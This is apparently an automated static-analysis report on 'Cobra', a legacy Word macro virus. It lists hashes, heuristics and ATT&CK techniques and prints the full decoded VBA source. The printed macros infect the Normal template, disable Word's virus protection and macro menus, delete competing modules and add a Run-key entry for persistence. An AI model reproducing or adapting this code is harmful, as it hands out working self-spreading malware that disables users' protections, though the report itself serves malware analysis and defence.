Cobra — Office (OLE) malware analysis

Static analysis result for SHA-256 58703d5bc3ba9a31…

MALICIOUS

Office (OLE)

Size: 39.0 KB
Created: 1997-09-17 11:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 1b7689a33a58e066ef3314e26d85d1c5
SHA-1: e5a4bce1c0cb15ffa52abd0d1879961b552cad24
SHA-256: 58703d5bc3ba9a31861e5c0274d2729bbf5bbd52b46007421f47bc301f752d0a
Risk Score: 240

Malware Insights

Cobra · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Cobra-12'. The presence of VBA macros, specifically the 'AutoOpen' and 'Auto_Close' subroutines within the 'BornCobra' module, indicates malicious intent. These macros disable security features, namely Word's built-in virus protection and the prompt to save the Normal template, most likely to facilitate further infection or payload delivery.

Heuristics (5)

  • ClamAV: Doc.Trojan.Cobra-12 (severity: critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Cobra-12
  • VBA macros detected (severity: medium, 2 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (severity: high, OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (severity: medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12876 bytes
SHA-256: 5b0020890f88da0659871b8f85222fa285e69cc9796bd9e963836575630d6999
Detection
ClamAV: Doc.Trojan.Cobra-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BornCobra"
'Cobra Version 2.0E
'A intelligent member of Cobra family

Sub AutoOpen()
Call IntMenu
Call InfCobra
Call RegE
End Sub
Sub AutoClose()
Call IntMenu
Call InfCobra
Call RegE
End Sub
Sub FileNew()
Call IntMenu
Call InfCobra
Call RegE
Dialogs(wdDialogFileNew).Show
End Sub
Sub FileOpen()
Call IntMenu
Call InfCobra
Call RegE
Dialogs(wdDialogFileOpen).Show
End Sub
Sub FileExit()
On Error Resume Next
Call IntMenu
Call InfCobra
Call RegE
WordBasic.FileExit
End Sub
Sub IntMenu()
On Error Resume Next
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls("Macro").Visible = False
CommandBars("Tools").Controls("Macro").Delete
CommandBars("View").Controls("Toolbars").Enabled = False
CommandBars("View").Controls("Toolbars").Visible = False
CommandBars("View").Controls("Toolbars").Delete
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End Sub
Sub InfCobra()
On Error Resume Next
Dim Mac, MacFound
MacFound = False
For Each Mac In NormalTemplate.VBProject.VBComponents
If Mac.Name <> "ThisDocument" And Mac.Name <> "BornCobra" Then
Application.OrganizerDelete Source:=NormalTemplate.FullName, _
Name:=Mac.Name, Object:=wdOrganizerObjectProjectItems
End If
Next
For Each Mac In NormalTemplate.VBProject.VBComponents
If Mac.Name = "BornCobra" Then
MacFound = True
End If
Next
If MacFound = False Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="BornCobra", _
Object:=wdOrganizerObjectProjectItems
End If
MacFound = False
For Each Mac In ActiveDocument.VBProject.VBComponents
If Mac.Name <> "ThisDocument" And Mac.Name <> "BornCobra" _
And Mac.Name <> "Reference to Normal" Then
Application.OrganizerDelete Source:=ActiveDocument.FullName, _
Name:=Mac.Name, Object:=wdOrganizerObjectProjectItems
End If
Next
For Each Mac In ActiveDocument.VBProject.VBComponents
If Mac.Name = "BornCobra" Then
MacFound = True
End If
Next
If MacFound = False Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, Name:="BornCobra", _
Object:=wdOrganizerObjectProjectItems
End If
End Sub
Sub RegE()
SR = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner")
If SR <> "Cobra" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "Cobra"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "349,PB/ER/DHK-1217/BD"
End If
ID = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "InfectDate")
If Not IsDate(ID) Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "InfectDate") = Format(Date, "mm/dd/yyyy")
ID = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "InfectDate")
End If
CD = Format(Date, "mm/dd/yyyy")
TD = DateValue(CD) - DateValue(ID)
If TD > 60 Then
SysR = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "SystemRoot")
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Cobra") = SysR + "\Cobra.Doc"
ActiveDocument.SaveAs (SysR + "\Cobra.Doc"), FileFormat:=wdFormatTemplate
WordBasic.FileExit
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/37f01cfb32e34f8c831bb02f3c8a128b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 90
... (truncated)